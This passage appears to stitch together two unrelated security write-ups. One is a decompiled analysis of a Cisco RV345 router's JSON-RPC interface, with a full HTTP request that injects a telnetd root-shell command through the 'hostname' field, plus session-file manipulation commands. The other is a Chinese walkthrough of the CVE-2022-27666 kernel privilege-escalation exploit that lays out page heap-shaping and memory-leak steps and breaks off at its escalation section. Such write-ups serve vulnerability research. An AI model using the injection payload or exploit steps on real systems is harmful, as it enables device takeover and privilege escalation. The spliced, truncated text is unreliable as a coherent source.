    || !strcmp(method, "u2d_check_password")
    || !strcmp(method, "u2d_change_password")
    || !strcmp(method, "change_password")
    || !strcmp(method, "add_users")
    || !strcmp(method, "set_users")
    || !strcmp(method, "del_users") )
  {
    return handle_user_rpc_request(json_ctx, ret_str);
  }
  if ( !strcmp(method, "get_downloadstatus")
    || !strcmp(method, "get_wifi_button_state")
    || !strcmp(method, "check_config")
    || !strcmp(method, "get_model_tree")
    || !strcmp(method, "get_timezones") )
  {
    if ( check_login_status(json_ctx, 1, 2) )
      return 0;
    ret = handle_status_rpc_request((int)json_ctx, ret_str);
  }
  else if ( !strncmp(method, "get_", 4u) || !strncmp(method, "u2d_get_", 8u) )
  {
    if ( check_login_status(json_ctx, 1, 2) )
      return 0;
    ret = handle_get_rpc_request(json_ctx, ret_str);
  }
  else if ( !strcmp(method, "set_bulk") )
  {
    if ( check_login_status(json_ctx, 2, 2) )
      return 0;
    ret = handle_set_bulk_rpc_request(json_ctx, ret_str);
  }
  else if ( !strncmp(method, "set_", 4u) || !strncmp(method, "del_", 4u) || !strncmp(method, "u2d_set_", 8u) )
  {
    if ( check_login_status(json_ctx, 2, 2) )
      return 0;
    ret = handle_set_del_rpc_request(json_ctx, (int *)ret_str, 1);
  }
  else
  {
    if ( strncmp(method, "action", 6u) && strncmp(method, "u2d_rpc_", 8u) )
    {
      error("ERROR METHOD CASE !!!");
      return 0;
    }
    if ( check_login_status(json_ctx, 1, 2) )
      return 0;
    ret = handle_action_rpc_request(json_ctx, ret_str);
  }
  session_close();
  return ret;
}

int __fastcall handle_action_rpc_request(ctx *ctx, _DWORD *ret_str)
{
  ...
  method = ctx->method;
  params = ctx->params;
  ...
    else if ( !strcmp(method, "action") && json_object_object_get_ex(params, "rpc", &rpc_json_obj) )
    {
      p_action = &action;
      ...
      rpc_str = json_object_get_string(rpc_json_obj);
      ...
      if ( !jsonrpc_action_table_by_method(&action, rpc_str) )
        p_action = 0;
      ...
      if ( json_object_object_get_ex(params, "input", &input_param) )
        params = input_param;
      if ( p_action )
      {
        ret = jsonrpc_action_config((int)p_action, params, (int)&v17);

int __fastcall jsonrpc_action_table_by_method(action *ret_action, char *rpc_str)
{
  ...
    action_table = &json_action_table_ptr;
  action = *action_table;
  memset(ret_action, 0, sizeof(action));
  while ( 1 )
  {
    if ( !action->name )
      return 0;
    if ( !strcmp(rpc_str, action->name) )
      break;
    if ( !++action )
      return 0;
  }
  p_post_handler = &action->post_handler;
  do
  {
    ...
    // 拷贝找到的action到ret_action当中
  }
  while ( !v10 );
  return 1;
}

00000000 action          struc ; (sizeof=0x14, mappedto_55)
00000000 name            DCD ?                   ; offset
00000004 field_4         DCD ?
00000008 pre_handler     DCD ?                   ; offset
0000000C handler         DCD ?                   ; offset
00000010 post_handler    DCD ?                   ; offset
00000014 action          ends
.data:00043BD0                 DCD aUpdateClients      ; "update-clients"
.data:00043BD4                 DCD 0
.data:00043BD8                 DCD 0
.data:00043BDC                 DCD action__maapi
.data:00043BE0                 DCD 0

int  jsonrpc_action_config(action *action, int param_obj, _DWORD *a3))(int, int *)
{
  ...
  if ( v7 )
    v7 = json_tokener_parse();
  func = (int)action->pre_handler;
  if ( func )
    func = func(v6, &v16);
  ...
  pid = getppid();
  info("[%d|action|%s] - pre-handler %d.", pid, action->name, func);
  handler = action->handler;
  if ( handler )
    func = handler(v16, v9, &v17);
  ...
  post_handler = action->post_handler;
  if ( post_handler )
    func = post_handler(v17, a3);
  ...
}

int __fastcall action__maapi(int a1, int a2, int *a3)
{
  ...
  result = jsess_action(g_h_sess_db);
  ...
}
.data:00044248 jmaapi_api      DCD jmaapi_open         ; DATA XREF: LOAD:00000D6C↑o
.data:00044248                                         ; jsess_set_type:loc_7F48↑o ...
.data:0004424C                 DCD jmaapi_apply
.data:00044250                 DCD jmaapi_close
.data:00044254                 DCD jmaapi_init
.data:00044258                 DCD jmaapi_get
.data:0004425C                 DCD jmaapi_set
.data:00044260                 DCD jmaapi_del
.data:00044264                 DCD jmaapi_action
int __fastcall jmaapi_action(int a1, int a2, int a3, int a4, int a5)
{
  ...
    return mctx_rpc(s, a3, a4, a5);
}

int __fastcall mctx_rpc(int *a1, int a2, int a3, int a4)
{
  ...
  while ( v9 )
  {
    .
    ...
    v5 = maapi_request_action_str_th(sock, thandle, (int)&output, v15, v10);
    ...
      if ( output )
      {
        mctx_rpc_cli((int)a1, (char *)output, a3, a4);
        free(output);
      }
      if ( !json_object_object_length(a4) )
      {
        v16 = json_object_new_int(0);
        json_object_object_add(a4, "code", v16);
        v17 = json_object_new_string("Success");
        json_object_object_add(a4, "errstr", v17);
      }
    }
  }
  StrBufFree(&v27);
  return v5;
}

int maapi_request_action_str_th(int sock, int thandle, char **output,
const char *cmd_fmt, const char *path_fmt, ...);
/*Does the same thing as maapi_request_action_th(), but takes the parameters as a string and
returns the result as a string. The library allocates memory for the result string, and the caller is responsible
for freeing it. This can in all cases be done with code like this:
*/
char *output = NULL;
if (maapi_request_action_str_th(sock, th, &output,
 "test reverse listint [ 1 2 3 4 ]", "/path/to/action") == CONFD_OK) {
 ...
 free(output);
}

POST /jsonrpc HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/plain, */*
Content-Length: 350
Connection: close
Cookie: selected_language=English; user=cisco; blinking=1; config-modified=1; disable-startup=0; redirect-admin=0; group=admin; attributes=RW; ru=0; bootfail=0; model_info=RV345; fwver=1.0.03.24; session_timeout=false; sessionid=138b633ddd844b81a8ea48a149819f645fbe31fb64a1bd7cc0072f3d14420da0; current-page=WAN_Settings
{
  "jsonrpc":"2.0",
  "method":"action",
  "params":{
    "rpc":"update-clients",
    "input":{
      "clients": [
        {
          "hostname": "hostname$(/usr/sbin/telnetd -l /bin/sh -p 2306)",
          "mac": "64:d1:a3:4f:be:e1",
          "device-type": "client",
          "os-type": "windows"
        }
      ]
    }
  }
}

/tmp # ls websession/
session  token
/tmp # cat websession/session
{
  "max-count":1,
  "cisco":{
    "dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8":{
      "user":"cisco",
      "group":"admin",
      "time":2433831,
      "access":1,
      "timeout":1800,
      "leasetime":13118911
    }
  }
}
/tmp # ls websession/token/
dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8
/tmp # cat websession/token/dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8
/tmp #

{
  "max-count":1,
  "cisco":{
    "dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8":{
      "user":"cisco",
      "group":"admin",
      "time":2433831,
      "access":1,
      "timeout":1800,
      "leasetime":13118911
    }
  }
}

/tmp # ls -al / | grep var
lrwxrwxrwx    1 root     root             4 Oct 22  2021 var -> /tmp

# /tmp/websession websession_bak
mv /tmp/websession /tmp/www/websession_bak
# /tmp/3g-4g-driver websession
mv /tmp/3g-4g-driver /tmp/www/websession
# /tmp/upload/0000000016 session
mv /tmp/upload/0000000016 /tmp/www/session
# /tmp/firmware token
mv /tmp/firmware /tmp/www/token
# /tmp/upload/0000000017 dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8
mv /tmp/upload/0000000017 /tmp/www/dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8
# /tmp/www/dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8 token
mv /tmp/www/dead00a47a9b1177e259bd84dff3bd50651df76f61c20139e5b86d6d4bafd2e8 /tmp/www/token
# /tmp/www/token websession
mv /tmp/www/token /tmp/www/websession
# /tmp/www/session websession
mv /tmp/www/session /tmp/www/websession
# /var tmp
mv /var /tmp/www/tmp
# /tmp/www/websession tmp
mv /tmp/www/websession /tmp/www/tmp

location /api/operations/ciscosb-file:form-file-upload {
    set $deny 1;
    if ($http_authorization != "") {
        set $deny "0";
    }
    if ($deny = "1") {
        return 403;
    }
    upload_pass /form-file-upload;
    upload_store /tmp/upload;
    upload_store_access user:rw group:rw all:rw;
    upload_set_form_field $upload_field_name.name "$upload_file_name";
    upload_set_form_field $upload_field_name.content_type "$upload_content_type";
    upload_set_form_field $upload_field_name.path "$upload_tmp_path";
    upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";
    upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";
    upload_pass_form_field "^.*$";
    upload_cleanup 400 404 499 500-505;
    upload_resumable on;
}

  jsonutil_get_string(dword_2348C, &file_path, "\"file.path\"", -1);
  ...
  if ( !file_path || match_regex("^/tmp/upload/[0-9]{10}$", file_path) )
  {
    puts("Content-type: text/html\n");
    printf("Error Input");
    goto LABEL_31;
  }

    rpc update-clients {
        input {
            list clients {
                key mac;
                leaf mac {
                    type yang:mac-address;
                    mandatory true;
                }
                leaf hostname {
                    type inet:domain-name;
                }
                uses ciscosb-security-common:DEVICE-OS-TYPE;
            }
        }
    }

阅读原文

跳转微信打开

【kernel exploit】从 PWN2OWN CVE-2022-27666 看内核页风水

知识点：

（1）使用 msg_msg 构造任意写来篡改 modprobe_path，通过 FUSE 来处理页错误（克服5.11版本之后用户没有userfaultfd权限的问题，肯定有一大波CTF题将要效仿）。

（2）由于漏洞对象位于 8-page，已经不能用常规的堆喷（slub allocator）来利用了，得利用页喷射（buddy system），作者分析了伙伴系统的源码，可以学习页喷知识（主要采用 ring_buffer 进行页喷和页风水，值得学习）。某种程度上来说本漏洞是一种 cross-cache overflow，从一个页溢出覆盖到下一个页上的cache（因为页上可以含有cache也可以是单纯的页）。

（3）采用新的弹性对象来泄露信息，也即user_key_payload弹性对象，由于长度变量和数据在一起，所以不担心溢出时覆盖到指针（限制是只能分配最多200个最长20000字节）。

影响版本：Linux-v5.17-rc8 以前，v5.17-rc8已修补。

测试版本：Linux-v5.16.14 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项：所有和 INET6 / TUNNEL / XFRM / CONFIG_NET_KEY / CONFIG_NF_SOCKET_IPV6 相关的选项都勾上y，特别是以下选项。

CONFIG_XFRM_ESP=y
CONFIG_INET_ESP=y
CONFIG_INET_ESP_OFFLOAD=y
CONFIG_INET6_ESP=y
CONFIG_INET6_ESP_OFFLOAD=y

在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.16.14.tar.xz
$ tar -xvf linux-5.16.14.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录：/arch/x86/boot/bzImage。

漏洞描述：位于目录 net/ipv4/esp4.c 和 net/ipv6/esp6.c 中的 IPsec ESP transformation 代码存在堆溢出。漏洞自2017年引入（cac2661c53f3 / 03e2a30f6a27）。

本漏洞能够在最新的 Ubuntu 21.10 上提权，来自于pwn2own 2022，能够影响 Ubuntu / Fedora / Debian。首次进行 page-level heap fengshui 和 cross-cache overflow（环境：4G内存，2 CPU）。

补丁：patch 补丁引入 ESP_SKB_FRAG_MAXSIZE，大小为 32768 ，也就是 8-page，如果 allocsize 大于8页，则跳转到 COW。

diff --git a/include/net/esp.h b/include/net/esp.h
index 9c5637d41d951..90cd02ff77ef6 100644
--- a/include/net/esp.h
+++ b/include/net/esp.h
@@ -4,6 +4,8 @@
 #include <linux/skbuff.h>
+#define ESP_SKB_FRAG_MAXSIZE (PAGE_SIZE << SKB_FRAG_PAGE_ORDER)
+
 struct ip_esp_hdr;
 static inline struct ip_esp_hdr *ip_esp_hdr(const struct sk_buff *skb)
diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
index e1b1d080e908d..70e6c87fbe3df 100644
--- a/net/ipv4/esp4.c
+++ b/net/ipv4/esp4.c
@@ -446,6 +446,7 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
     struct page *page;
     struct sk_buff *trailer;
     int tailen = esp->tailen;
+    unsigned int allocsz;
     /* this is non-NULL only with TCP/UDP Encapsulation */
     if (x->encap) {
@@ -455,6 +456,10 @@ int esp_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *
             return err;
     }
+    allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+    if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+        goto cow;
+
     if (!skb_cloned(skb)) {
         if (tailen <= skb_tailroom(skb)) {
             nfrags = 1;
diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
index 7591160edce14..b0ffbcd5432d6 100644
--- a/net/ipv6/esp6.c
+++ b/net/ipv6/esp6.c
@@ -482,6 +482,7 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
     struct page *page;
     struct sk_buff *trailer;
     int tailen = esp->tailen;
+    unsigned int allocsz;
     if (x->encap) {
         int err = esp6_output_encap(x, skb, esp);
@@ -490,6 +491,10 @@ int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info
             return err;
     }
+    allocsz = ALIGN(skb->data_len + tailen, L1_CACHE_BYTES);
+    if (allocsz > ESP_SKB_FRAG_MAXSIZE)
+        goto cow;
+
     if (!skb_cloned(skb)) {
         if (tailen <= skb_tailroom(skb)) {
             nfrags = 1;

保护机制：KASLR / SMEP / SMAP

利用总结：主要利用过程位于 loop() 函数：

（1）初始化：设置CPU affinity，设置漏洞socket（文件描述符存在 r[1]）；

（2）缓解噪声（避免 order-2 从 order-3 取页 或者 order-2 的页合并到 order-3，影响到漏洞对象的排布）：

• （2-1）耗尽 order-0/1/2 的 freelist：喷射0x1000个大小为0x1000的 ring_buffer；

• （2-2）分配 (101002) 个 4-page，释放一半：采用 ring_buffer；

• （2-3）释放 (2-1) 中堆喷的对象；

（3）泄露 msg_msg->next（尝试9次）：堆上布局3个相邻的对象—— vul object -> user_key_payload -> msg_msg。

• （3-1）耗尽 order-3 的freelist，使得堆排布时从 order-4 取页，保证8-page 相邻：喷射 0x2000 个大小为 0x8000 的 ring_buffer；

• （3-2）耗尽 kmalloc-4k，使得分配 user_key_payload 时从 buddy system 取页（order-3）：调用 setxattr() 分配 0x50*8 个 kmalloc-4k；

• （3-3）分配3个连续的 8-page 占位对象：采用 ring_buffer 对象；

• （3-4）释放第2个占位对象，分配1个8-page slab（分配1个 user_key_payload 和7个 setxattr()）；

• （3-5）喷射 100 个 seq_operations 对象，便于之后泄露内核基址；

• （3-6）释放第3个占位对象，分配1个8-page slab（喷射16个 msg_msg，位于 kmalloc-4k / kmalloc-32）；

• （3-7）释放第1个占位对象，分配漏洞对象，触发越界写来修改 user_key_payload->datalen；

• （3-8）通过 user_key_payload 进行越界读，泄露 msg_msg->next；

（4）泄露内核基址（尝试50次）：堆上布局2个相邻的对象——vul object -> msg_msg。

• （4-1）耗尽 kmalloc-4k，使得分配 msg_msg 时从 buddy system 取页（order-3）：堆喷0x100个大小为0x1000 的 ring_buffer；

• （4-2）耗尽 order-3 的freelist，使得堆排布时从 order-4 取页，保证8-page 相邻：喷射 0x100 个大小为 0x8000 大小的 ring_buffer；

• （4-3）分配8*2个连续的 8-page 占位对象（占位对象）：采用 ring_buffer 对象；

• （4-4）释放第2个占位对象，分配1个8-page slab （分配 9 个 msg_msg，位于 kmalloc-4k / kmalloc-32）；

• （4-5）释放第1个占位对象，分配漏洞对象，触发越界写来修改 msg_msg->m_ts & msg_msg->next （改成上一步泄露的 msg_msg->next）；

• （4-6）通过 msg_msg 进行越界读，泄露 seq_operations->start / stop / next 指针；

（5）篡改 modprobe_path 提权（尝试50次）：堆上布局2个相邻的对象——vul object -> msg_msg。

• （5-1）设置 FUSE，页错误处理地址为 fuse_evil_addr = 0x1339000（FUSE的 evil_read_pause() 函数在处理页错误时，会往该地址写入字符串 /tmp/get_rooot\x00，也即提权程序）；

• （5-2）耗尽 order-3 的freelist，使得堆排布时从 order-4 取页，保证8-page 相邻：喷射 0x100 个大小为 0x8000 大小的 ring_buffer；

• （5-3）分配2个连续的 8-page 占位对象（占位对象）：采用 ring_buffer 对象；

• （5-4）释放第2个占位对象，分配1个8-page slab （分配 9 个 msg_msg，位于 kmalloc-4k / kmalloc-32）（注意，用户message地址设置为 fuse_evil_addr-8 == 0x1339000-8，以便在内核拷贝消息时触发页错误而暂停）；

• （5-5）释放第1个占位对象，分配漏洞对象，触发越界写来修改 msg_msg->next（改成 modprobe_path-8）；

• （5-6）通过写pipe来通知 FUSE 的 evil_read_pause() 函数，结束页错误处理，使得 msg_msg 消息完成拷贝，篡改 modprobe_path；

• （5-7）执行错误binary文件触发modprobe，完成提权。

1. 漏洞分析

简介：漏洞来自 Linux esp6 crypto 模块，接收缓冲区是 8-page，但发送者可以发送大于 8-page 的数据，导致页溢出。

1-1 漏洞对象创建

漏洞对象创建：esp6_output_head() 负责创建 receive buffer，allocsize 变量不重要，因为 skb_page_frag_refill() 会默认分配 8-page 内存（order-3 pages）。

调用栈：sendmsg() -> __sys_sendmsg() -> ___sys_sendmsg() -> ____sys_sendmsg() -> sock_sendmsg() -> sock_sendmsg_nosec() -> rawv6_sendmsg() -> rawv6_push_pending_frames() -> ip6_push_pending_frames() -> ip6_send_skb() -> ip6_local_out() -> dst_output() -> xfrm6_output() -> NF_HOOK_COND() -> __xfrm6_output() -> [xfrm_output()]() -> xfrm_output2() -> xfrm_output_resume() -> dst_output() -> ip6_output() -> NF_HOOK_COND() -> ip6_finish_output -> __ip6_finish_output -> ip6_finish_output2() -> neigh_output() -> neigh_hh_output() -> dev_queue_xmit() -> __dev_queue_xmit() -> validate_xmit_skb() -> validate_xmit_xfrm() -> esp6_xmit() -> esp_output_head() 34层，太复杂了。。。

int esp6_output_head(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *esp)
{
        ...
        struct page_frag *pfrag = &x->xfrag;          // x->xfrag->page = vul object
        int tailen = esp->tailen;
        allocsize = ALIGN(tailen, L1_CACHE_BYTES);
        spin_lock_bh(&x->lock);
        if (unlikely(!skb_page_frag_refill(allocsize, pfrag, GFP_ATOMIC))) {    // [1]
            spin_unlock_bh(&x->lock);
            goto cow;
        }
        ...
}
bool skb_page_frag_refill(unsigned int sz, struct page_frag *pfrag, gfp_t gfp)
{
        if (pfrag->offset + sz <= pfrag->size)
        return true;
    ...
    if (SKB_FRAG_PAGE_ORDER &&
        !static_branch_unlikely(&net_high_order_alloc_disable_key)) {
        pfrag->page = alloc_pages((gfp & ~__GFP_DIRECT_RECLAIM) |               // [2] 
                      __GFP_COMP | __GFP_NOWARN |
                      __GFP_NORETRY,
                      SKB_FRAG_PAGE_ORDER);
        ...
    }
    ...
    return false;
}

1-2 越界写

漏洞对象越界：null_skcipher_crypt() 函数中，内核拷贝了 N-page 数据，导致OOB。

static int null_skcipher_crypt(struct skcipher_request *req)
{
    struct skcipher_walk walk;
    int err;
    err = skcipher_walk_virt(&walk, req, false);
    while (walk.nbytes) {
        if (walk.src.virt.addr != walk.dst.virt.addr)
            // out-of-bounds write
            memcpy(walk.dst.virt.addr, walk.src.virt.addr,
                   walk.nbytes);
        err = skcipher_walk_done(&walk, 0);
    }
    return err;
}

调用栈：... -> esp6_xmit() -> esp6_output_tail() -> crypto_aead_encrypt() -> crypto_authenc_encrypt() -> crypto_authenc_copy_assoc() -> crypto_skcipher_encrypt() -> null_skcipher_crypt() 可以看到，esp6_xmit() 先调用 esp6_output_head() 分配漏洞对象的 8-page 内存（地址存放在x->xfrag->page），再调用 esp6_output_tail() 将该内存赋值给 req.dst 并最后触发OOB。

static int esp6_xmit(struct xfrm_state *x, struct sk_buff *skb,  netdev_features_t features)
{
    int err;
    int alen;
    struct esp_info esp;
    bool hw_offload = true;
    ... ...
    esp.tailen = esp.tfclen + esp.plen + alen;          // esp.tailen   ->   allocsize
    if (!hw_offload || !skb_is_gso(skb)) {
        esp.nfrags = esp6_output_head(x, skb, &esp);    // [1] alloc the vulnerable object, saved at x->xfrag->page
        if (esp.nfrags < 0)
            return esp.nfrags;
    }
    ... ...
    err = esp6_output_tail(x, skb, &esp);               // [2] trigger OOB
    ... ...
}
int esp6_output_tail(struct xfrm_state *x, struct sk_buff *skb, struct esp_info *esp)
{
    ... ... 
    if (!esp->inplace) {
        int allocsize;
        struct page_frag *pfrag = &x->xfrag;
        ... ...
        page = pfrag->page;
        get_page(page);
        /* replace page frags in skb with new page */
        __skb_fill_page_desc(skb, 0, page, pfrag->offset, skb->data_len);
        pfrag->offset = pfrag->offset + allocsize;
        spin_unlock_bh(&x->lock);
        sg_init_table(dsg, skb_shinfo(skb)->nr_frags + 1);
        err = skb_to_sgvec(skb, dsg,
                       (unsigned char *)esph - skb->data,
                       assoclen + ivlen + esp->clen + alen);
    ... ...
    aead_request_set_crypt(req, sg, dsg, ivlen + esp->clen, iv);       // [2-1]  dsg  =  x->xfrag->page
    aead_request_set_ad(req, assoclen);
    ... ...
    err = crypto_aead_encrypt(req);        // [2-2] req->dst = dsg
    ... ...
}
EXPORT_SYMBOL_GPL(esp6_output_tail);
static int null_skcipher_crypt(struct skcipher_request *req)
{
    struct skcipher_walk walk;
    int err;
    err = skcipher_walk_virt(&walk, req, false);            // [3] walk->dst = req.dst
    while (walk.nbytes) {
        if (walk.src.virt.addr != walk.dst.virt.addr)
            memcpy(walk.dst.virt.addr, walk.src.virt.addr,  // [4]  trigger OOB
                   walk.nbytes);
        err = skcipher_walk_done(&walk, 0);
    }
    return err;
}

漏洞缺陷：作者利用时，发送 16-page 数据，可以溢出 8-page，问题是 esp_output_fill_trailer() 会根据消息长度和所用协议类型，在末尾添加几个字节（对我们来说是垃圾数据）。

static inline void esp_output_fill_trailer(u8 *tail, int tfclen, int plen, __u8 proto)
{
    /* Fill padding... */
    if (tfclen) {
        memset(tail, 0, tfclen);
        tail += tfclen;
    }
    do {
        int i;
        for (i = 0; i < plen - 2; i++)
            tail[i] = i + 1;
    } while (0);
    tail[plen - 2] = plen - 2;
    tail[plen - 1] = proto;
}

2. Buddy system 知识

说明：分析伙伴系统的原理是研究 page-level heap fengshui 的前提。

2-1 page allocator

页分配器的知识可以参见 page_alloc.c 源码。

简介：Linux page allocator 管理内核底层的物理页，SLUB / SLAB / SLOB 内存分配器都在 Page allocator 之上。例如，当内核耗尽所有 kmalloc-4k slab之后，内存分配器会向 Page allocator 申请内存，由于 kmalloc-4k 位于 8-page slab （order 3），所以 Page allocator 会申请 8-page 内存给内存分配器。

存储结构：Page allocator 采用 free_area 结构（zone->free_area 数组，长度为 MAX_ORDER == 1，所以最大order为11）来保存空闲页，也就是个保存不同 order/size 页的数组，采用 order 来区分不同大小的页（例如，N-order 表示大小为 PAGE_SIZE<<3 的页；order-0 就表示大小为 PAGE_SIZE 的页）。free_area 中每个 order 都对应一个 free_list，从 free_list 分配或将页释放后放入 free_list。

struct free_area {
    struct list_head    free_list[MIGRATE_TYPES];
    unsigned long       nr_free;
};

cache 与页分配：不同的slab如果耗尽了会申请不同 order 的页，例如，kmalloc-256 会从 order-0 申请页，而 kmalloc-512 会从 order-1 申请页，kmalloc-4k 会从 order-3 申请页。

split page：如果 free_list 中没有空闲页，则 lower-order free_area 从 higher-order free_area 取页，higher-order free_area 将页一分为二，然后 lower-order free_area 将页返回给申请者（例如 alloc_pages()）。例如，当 order-2（4-page）的 free_list 耗尽之后，就从 order-3 申请页，order-3 的页分成两个 4-page 页，位于低地址的 4-page 返回给申请者，高地址的 4-page 保存在 order-2 的free_list 中供下次申请。原理如下所示：

merge page：如果 free_list 中有很多空闲页，页分配器会整合两个相邻的、order相同的页，并放入 higher-order free_area 。还是以刚才的例子来看，假设 order-3 被分成两个 order-2 的页，其中一个存放在 order-2 的 free_list，只要被分配的页又被释放回 order-2 的 free_list，页分配器会检查新释放的页在同一 free_list 中是否存在相邻的页（这俩就被称为 buddy），存在的话就将这俩合并后放入 order-3。

对应源码：以下代码展示了页分配器如何从 free_area 中选取页以及如何从 higher-order 中取页。

static __always_inline
struct page *__rmqueue_smallest(struct zone *zone, unsigned int order,
                        int migratetype)
{
    unsigned int current_order;
    struct free_area *area;
    struct page *page;
    for (current_order = order; current_order < MAX_ORDER; ++current_order) {
        // Pick up the right order from free_area
        area = &(zone->free_area[current_order]);
        // Get the page from the free_list
        page = get_page_from_free_area(area, migratetype);
        // If no freed page in free_list, goes to high order to retrieve
        if (!page)
            continue;
        del_page_from_free_list(page, zone, current_order);
        expand(zone, page, order, current_order, migratetype);
        set_pcppage_migratetype(page, migratetype);
        return page;
    }
    return NULL;
}
static inline struct page *get_page_from_free_area(struct free_area *area,
                        int migratetype)
{
    return list_first_entry_or_null(&area->free_list[migratetype],
                    struct page, lru);
}

2-2 shaping heap

页风水目标：现在讨论下如何为 OOB write 布局堆结构。现在已知在页分配器中，每种 order 的页都保存在 free_area->free_list 中。由于不能保证在同一 free_list 中的两个页是连续的，所以即便连续申请2个同一order的页，这2个页可能相隔很远。为了更好的控制堆布局，我们需要确保 free_list 中所有的页是连续的。首先耗尽目标order的 free_list，迫使其向 higher-order 取页，这样取过来的页会被划分成两段连续的内存。

缓解噪声（保证连续）：有些内核进程也会分配和释放页，影响了堆布局。回到本漏洞中来，我们的目标是布局连续的 order-3 的页，但是可能会有 order-3 的页被划分到 order-2 或者有 order-2 的页被整合到 order-3。为了缓解噪声影响，可以采取以下步骤：

（1）耗尽 order 0, 1, 2 的 free_list；（采用socket中的 ring_buffer 来堆喷—页风水）

（2）分配大量的 order-2 对象 （假定为N个），这样，order-2 会向 order-3 取页；（分10个进程，每个进程喷200个 4-page 大小的 ring_buffer）

（3）释放第2步中一半的对象，这样，有 N/2 个对象会存入 order-2 的 free_list；

（4）释放第1步所有的对象；

第3步中，释放一半的 order-2 就避免其发生整合而被存入 order-3，这样 order-2 的 free_list 中就有 N/2 个页可以使用了，之后就不会从 order-3 取页或者整合到 order-3 了。避免我们构造连续的 8-page 时受到影响。

3. 漏洞利用

3-1 泄露方法

思路一（失败）：利用 msg_msg，覆写 msg_msg->m_ts 构造越界读。但是测试时发现，漏洞的垃圾字节会覆写 msg_msg->next 指针（m_ts 和 next 相邻），导致越界读失败。

思路二：利用 user_key_payload 结构（从 ELOISE 论文中找到）。可以看到，这个结构的 datalen 长度和数据在一起，这样即便垃圾字节会填到末尾，也不会破坏到指针了。

struct user_key_payload {
    struct rcu_head rcu;        // rcu指针可以被设置为NULL
    unsigned short  datalen;    /* length of this data */
    char        data[] __aligned(__alignof__(u64)); /* actual data */
};

key长度限制：Ubuntu 上默认会限制key的数量和长度。问题是导致溢出的对象位于 8-page，我们在漏洞对象后面也要布置一个 8-page 对象（暂时称为 victim slab），而在Ubuntu上，只有 kmalloc-2k / kmalloc-4k / kmalloc-8k 会从 order-3 取页。所以至少要使key被分配在 kmalloc-2k 上，才能使key位于 8-page 的页中。

$ sudo cat /proc/sys/kernel/keys/maxbytes 
20000
$ sudo cat /proc/sys/kernel/keys/maxkeys 
200

victim个数限制：可以用8个 kmalloc-4k 对象来填充victim slab，采用长度为 2049 的 user_key_payload 即可。这样 user_key_payload 总长度为 2049*8=16392，由于限制最多 20000 字节的key，只剩下 1 个 user_key_payload 可用 — ((20000-16392)/2049 = 1)，所以最多可以布置2个 victim slab，条件非常严苛。

增大victim个数：可以每个 victim slab 放一个 user_key_payload 对象，剩下的空间填充其他对象，user_key_payload 可以在 victim slab 中任意位置，因为本漏洞可以溢出覆盖整个 victim slab。这样，我们就可以喷9个 victim slab 了，增大的泄露的成功几率。

3-2 泄露内核基址

方法：其实本可以直接在 victim slab 后面放一个包含内核指针的对象，但是作者很想尝试 post 中通过篡改 msg_msg->next 进行任意读写的技术。先通过 user_key_payload 越界读来泄露 msg_msg->next 指针，然后伪造 msg_msg->m_ts & msg_msg->next （msg_msg->security 在Ubuntu上没用，可覆盖为0）进行任意读。

泄露msg_msg->next：堆上布局3个相邻的对象—— vul object -> user_key_payload -> msg_msg，注意 msg_msg->next 指向 kmalloc-32，并堆喷大量的 struct seq_operations 对象。触发越界写来篡改 user_key_payload->datalen，通过 user_key_payload 越界读来泄露 msg_msg->next 指针。为了增大成功几率，可以创建9对这种布局（3个相邻对象的堆布局）。

泄露内核基址：堆上布局2个相邻的对象——vul object -> msg_msg，触发越界写来篡改 msg_msg->m_ts & msg_msg->next ，通过 msg_msg 越界读来泄露 struct seq_operations 对象上的函数指针（因为之前泄露的 msg_msg->next 指向 kmalloc-32，而kmalloc-32 上已经喷射了很多 struct seq_operations 对象）。

总体步骤：（1）~（8）泄露 msg_msg->next ，（9）~（12）泄露内核基址。

（1）分配大量8-page 页来耗尽 order-3 的 free_list，这样 order-3 就会从 order-4 取页，保证内存连续性；

（2）分配3个连续的 8-page dumy 对象（占位对象）；（占位对象采用 ring_buffer）

（3）释放第2个占位对象，分配1个8-page slab，其中包含1个 user_key_payload 对象和7个其他对象（这7个对象采用多个子线程调用setxattr()来堆喷）；

（4）释放第3个占位对象，分配1个8-page slab，填满大小在4056~4072之间的 msg_msg，使得 msg_msgseg 位于 kmalloc-32；

（5）喷射大量的 struct seq_operations，和第4步的 msg_msgseg 位于同一cache；

（6）释放第1个占位对象，分配漏洞对象，触发越界写来修改 user_key_payload->datalen；

（7）如果第（6）步成功，就能通过 user_key_payload 进行越界读；

（8）如果第（7）步成功，就能泄露出 msg_msg->next 指针；

（9）分配2个连续的 8-page dumy 对象（占位对象）；

（10）释放第2个占位对象，分配1个8-page slab，填满 msg_msg；

（11）释放第1个占位对象，分配漏洞对象，触发越界写来篡改 msg_msg->m_ts & msg_msg->next ；

（12）如果第（11）步成功，就能越界读来泄露 struct seq_operations 对象上的函数指针。

3-3 提权

